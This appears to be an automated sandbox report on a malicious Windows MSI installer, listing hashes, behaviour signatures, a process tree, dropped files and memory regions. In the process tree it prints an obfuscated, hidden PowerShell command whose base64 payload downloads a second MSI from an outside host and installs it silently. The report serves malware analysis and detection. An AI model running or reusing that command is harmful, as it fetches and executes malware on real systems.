Analysis

  • max time kernel
    118s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    11-10-2023 11:29

General

  • Target

    b029b40badab029cbd916ab2e5147e9f01abd147e1bf9e5ed1564ee44a0d087f.msi

  • Size

    3.4MB

  • MD5

    5d9e72d1e3a99bec71fad561fa95037c

  • SHA1

    fbc94c649ba3d8bb6c7e1d98e7fdeea40cd395b2

  • SHA256

    b029b40badab029cbd916ab2e5147e9f01abd147e1bf9e5ed1564ee44a0d087f

  • SHA512

    8d0311d94a0de8646ec2733530a2db7d2c6e2b03f54e54ac0bc84538a636fe8211e6a582530d9ea8cd02ba08e259d778498d6f29e6744ba45f434d2a87874c97

  • SSDEEP

    49152:E6rGohlj9szAlopTyWD57kEv53rw6cvOlM3w99xYF/gr/QaTdxKJWNYCILZ:qoSTyqk7vvO8Q9xU/w/QPOI9

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\b029b40badab029cbd916ab2e5147e9f01abd147e1bf9e5ed1564ee44a0d087f.msi
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2224
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2944
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 71AA0EC271C95C31DBD95FF82949150E
      2⤵
      • Loads dropped DLL
      PID:2532
    • C:\Windows\Installer\MSIE2DA.tmp
      "C:\Windows\Installer\MSIE2DA.tmp" /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Temp\DllImport.bat"
      2⤵
      • Executes dropped EXE
      PID:1924
  • C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\DllImport.bat" "
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:268
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -Ex BYpAss -NONI -w hIDdEn -c dEVICECreDENTiALDePloYmeNt ; ieX($(Iex('[sySTEm.teXT.ENCOdIng]'+[cHAr]58+[Char]58+'uTF8.GETstrInG([SYStEm.cONveRt]'+[cHAr]0x3a+[chaR]0X3a+'FRomBASE64sTring('+[ChAr]34+'JHlyZ09mcWwgPSBBRGQtdHlwRSAtTUVtYkVyZGVGaU5JdGlvbiAnW0RsbEltcG9ydCgiVXJsbW9OIiwgQ2hhclNldCA9IENoYXJTZXQuQW5zaSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciBsUyxzdHJpbmcgSlVUeixzdHJpbmcgZ0FSbVFUUHhmLHVpbnQgeixJbnRQdHIgU3RSKTsnIC1OQU1lICJzWVgiIC1uQW1FU1BBY0UgRFhEIC1QYXNzVGhydTsgJHlyZ09mcWw6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHBzOi8vdGh1bWJuYWlsbXliaXMueHl6L3JtL3ZzLzE3L3JlbGVhc2UvMzMxMTAvbmxzZGF0YTA4MTYubXNpIiwiJGVOdjpBTExVU0VSU1BST0ZJTEVcbmxzZGF0YTA4MTYubXNpIiwwLDApO3N0QVJULVNsZWVwKDMpOyYgbXNpZXhlYyAvaSAiJGVOVjpBTExVU0VSU1BST0ZJTEVcbmxzZGF0YTA4MTYubXNpIiAvcW4gL25vcmVzdGFydA=='+[chAr]0x22+'))')))
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1176
      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sg026rmc.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2924
        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5FB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5FA.tmp"
          4⤵
            PID:2872
        • C:\Windows\system32\msiexec.exe
          "C:\Windows\system32\msiexec.exe" /i C:\ProgramData\nlsdata0816.msi /qn /norestart
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1808

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Config.Msi\f764906.rbs

      Filesize

      1KB

      MD5

      7a88bef00fada5e61367ebb866c7777d

      SHA1

      dbfbfb46e9eb231917326935aa9c968d880a425a

      SHA256

      aa6687607aea66d2200b7c1fbade2b379082eca2e8f5bfd506f497d8fbc6bf89

      SHA512

      8586ac27ffe56870f9e6ba53e6e9618cb7ea7400b29ac0a322ad5d76b3d60d71ea62b6a66bff64e3ded205b3e1b1024b62eaf8948aaf00768176510e89ca9a4d

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      f8d2aaff56717f5062ec7cf9b3ec6894

      SHA1

      a725db8fe4a8be67b4572984df091c4c2131cef1

      SHA256

      ed203b3128542adf59f4586328ed706c49ab3d1de19bb386db748fca4a7748d0

      SHA512

      0202a989d02317be0dfbf288e8eb575bd23fabbe515fb6effde4b96750f628b11d095405a07117a3d2180a704df94c7d8e4695465cf67adab28b3941ac0238fb

    • C:\Users\Admin\AppData\Local\Temp\Cab45E8.tmp

      Filesize

      61KB

      MD5

      f3441b8572aae8801c04f3060b550443

      SHA1

      4ef0a35436125d6821831ef36c28ffaf196cda15

      SHA256

      6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

      SHA512

      5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

    • C:\Users\Admin\AppData\Local\Temp\DllImport.bat

      Filesize

      5.0MB

      MD5

      5cae5e0da425c1f0f8e5cb45292b1dee

      SHA1

      79f65e65785f1a8d39b0a63cbbf0f1684b6d9770

      SHA256

      99f9875bd0d5d59071aaae3d7a6e2dbea0c883da0d39988f0081ee47d6fe25b1

      SHA512

      48bc1e9a8171aa81a251f27387f0cffe99bcd9350173b21dd6b287b0e00c2618a6ee632cdebce10313196fe35ebdb6f73f35d9ee3a2a1bb930680b4cb46231c7

    • C:\Users\Admin\AppData\Local\Temp\RES5FB.tmp

      Filesize

      1KB

      MD5

      c5affef376a4d47bae1e721632031454

      SHA1

      0b35e07fcb611f4a437b991496993d7922e67514

      SHA256

      dbf209a27015d7620cd71aafd48d1103332afcdcd1307870170408f6c4dfe390

      SHA512

      9b1fd56e99011eb9009a6171dcf133b8a6129fc35aad0a56a18cebfbb341229a9aba9102e3ec6d751e41dc2312eb66c9bbe2ed60a3adb44feb6d2861060b82fa

    • C:\Users\Admin\AppData\Local\Temp\Tar4639.tmp

      Filesize

      163KB

      MD5

      9441737383d21192400eca82fda910ec

      SHA1

      725e0d606a4fc9ba44aa8ffde65bed15e65367e4

      SHA256

      bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

      SHA512

      7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

    • C:\Users\Admin\AppData\Local\Temp\sg026rmc.dll

      Filesize

      3KB

      MD5

      ade5c364cb840476b61c30f54e5975e1

      SHA1

      f9213cdc4f99bcdb79aa2ea430675eac3ade5260

      SHA256

      3eafd3b7ae45336fe10aeed18f31ba3134a3075a850e63fcf8666ac4d987cdb0

      SHA512

      7c3355072ff7e189e284fb7c7bc0635d272f4b07cea80cb48c222261569c42c6e61c06caf254816947c941ad3b075b23437f4d7df92a8b08dcd4f44b3067254a

    • C:\Users\Admin\AppData\Local\Temp\sg026rmc.pdb

      Filesize

      7KB

      MD5

      aea6bb982f5e604aa9a7cbf87337be48

      SHA1

      f62e819088ee9a0298cfa989fd426ea879386fd1

      SHA256

      b5449b5d8f044d35ec38d79e5a6e6df9892cef4c8d5c10241f0cb6fdee7adaf4

      SHA512

      7fbb8e92ee802e47c935acd135a1949970e897a20859e883c3efc4418eb4332bb8fc2df3bd4c3806a121d34ce5f582b6e76c83a2bbd1ac16448c4d2d2c650dac

    • C:\Windows\Installer\MSI4D0B.tmp

      Filesize

      719KB

      MD5

      89f70b588a48793450dd603b6cd4096f

      SHA1

      9b6509c031856c715d62853c4e93efbdf48d5aeb

      SHA256

      066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

      SHA512

      fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

    • C:\Windows\Installer\MSI4FBB.tmp

      Filesize

      719KB

      MD5

      89f70b588a48793450dd603b6cd4096f

      SHA1

      9b6509c031856c715d62853c4e93efbdf48d5aeb

      SHA256

      066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

      SHA512

      fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

    • C:\Windows\Installer\MSI6DB7.tmp

      Filesize

      719KB

      MD5

      89f70b588a48793450dd603b6cd4096f

      SHA1

      9b6509c031856c715d62853c4e93efbdf48d5aeb

      SHA256

      066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

      SHA512

      fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

    • C:\Windows\Installer\MSI6DB7.tmp

      Filesize

      719KB

      MD5

      89f70b588a48793450dd603b6cd4096f

      SHA1

      9b6509c031856c715d62853c4e93efbdf48d5aeb

      SHA256

      066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

      SHA512

      fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

    • C:\Windows\Installer\MSIE2DA.tmp

      Filesize

      404KB

      MD5

      f3b3db27ab667f5ed37d1523424b06ac

      SHA1

      cdfa19dabc97005a3d5b3ac4dec171d0b3f2755d

      SHA256

      656c1f34c279d45fde64a8a71eeb8d17c7679543d61c05399826cc903d5ec397

      SHA512

      aa9cd94dde04b7b0235dc0aa06e3e74369ba1017ac4a6fcc3f4422619c10539b72f22a70341ef62a83af0d0fa1461c86343dd7e05cd238e658f73efea6c9d091

    • \??\c:\Users\Admin\AppData\Local\Temp\CSC5FA.tmp

      Filesize

      652B

      MD5

      2fe6f3e197de371035114f66146e992c

      SHA1

      6a87d0a10d8ef3f47115cb69382622c93fab5265

      SHA256

      ede0aba3a4520a40675776b96edecec4371c8e8e91abbe73f67f544a473606fd

      SHA512

      808ee0f912ecf93db125cd27638b355c70d34897afe184e957dd5053bb7cb1bd1a988a8950440853e479b1a3776794d7519454fede300ab07b9baf349419e475

    • \??\c:\Users\Admin\AppData\Local\Temp\sg026rmc.0.cs

      Filesize

      263B

      MD5

      bce29643104bb7fb77da7fcba72bd023

      SHA1

      44e512805c61bc7609f2a3fbbf25c3e5f050e448

      SHA256

      7a015f61be43eecda5b94569061c3745f2e98b2c6ab8322954fef37047cf0e60

      SHA512

      49eafe02b78be36036bedc28fba6265094d4368f8258f2d309a9a1d2b468dda69efaea149fa13bc51079c2f0a4dea55ce9221e5d10c186453ff9ef021ebf5fb8

    • \??\c:\Users\Admin\AppData\Local\Temp\sg026rmc.cmdline

      Filesize

      309B

      MD5

      409a8d116457fd67034b4995bde81f8f

      SHA1

      3c6cff8367bd37bc2c3b81720295dc33e5159bd8

      SHA256

      0eb375c023f097e742133b725f27992b6ba5100ae697aaceeb5542cb02918ee2

      SHA512

      4776c56206c8784b7a202457387e2613f546e70d1e904a7ee0f545d917e4c1698506f0c4d4aac5752e1356f38621ae8b4e7261c0e656e2ac48d58deef736be60

    • \Windows\Installer\MSI4D0B.tmp

      Filesize

      719KB

      MD5

      89f70b588a48793450dd603b6cd4096f

      SHA1

      9b6509c031856c715d62853c4e93efbdf48d5aeb

      SHA256

      066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

      SHA512

      fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

    • \Windows\Installer\MSI4FBB.tmp

      Filesize

      719KB

      MD5

      89f70b588a48793450dd603b6cd4096f

      SHA1

      9b6509c031856c715d62853c4e93efbdf48d5aeb

      SHA256

      066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

      SHA512

      fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

    • \Windows\Installer\MSI6DB7.tmp

      Filesize

      719KB

      MD5

      89f70b588a48793450dd603b6cd4096f

      SHA1

      9b6509c031856c715d62853c4e93efbdf48d5aeb

      SHA256

      066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

      SHA512

      fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

    • memory/1176-103-0x0000000002870000-0x00000000028F0000-memory.dmp

      Filesize

      512KB

    • memory/1176-101-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp

      Filesize

      9.6MB

    • memory/1176-107-0x0000000002870000-0x00000000028F0000-memory.dmp

      Filesize

      512KB

    • memory/1176-108-0x0000000002870000-0x00000000028F0000-memory.dmp

      Filesize

      512KB

    • memory/1176-104-0x000000001B310000-0x000000001B5F2000-memory.dmp

      Filesize

      2.9MB

    • memory/1176-100-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp

      Filesize

      9.6MB

    • memory/1176-106-0x0000000002450000-0x0000000002458000-memory.dmp

      Filesize

      32KB

    • memory/1176-128-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp

      Filesize

      9.6MB

    • memory/1176-123-0x0000000002860000-0x0000000002868000-memory.dmp

      Filesize

      32KB

    • memory/1176-105-0x0000000002870000-0x00000000028F0000-memory.dmp

      Filesize

      512KB

    • memory/1176-126-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp

      Filesize

      9.6MB

    • memory/1176-102-0x0000000002870000-0x00000000028F0000-memory.dmp

      Filesize

      512KB

    • memory/1924-91-0x0000000000260000-0x0000000000262000-memory.dmp

      Filesize

      8KB

    • memory/2924-114-0x0000000001FF0000-0x0000000002070000-memory.dmp

      Filesize

      512KB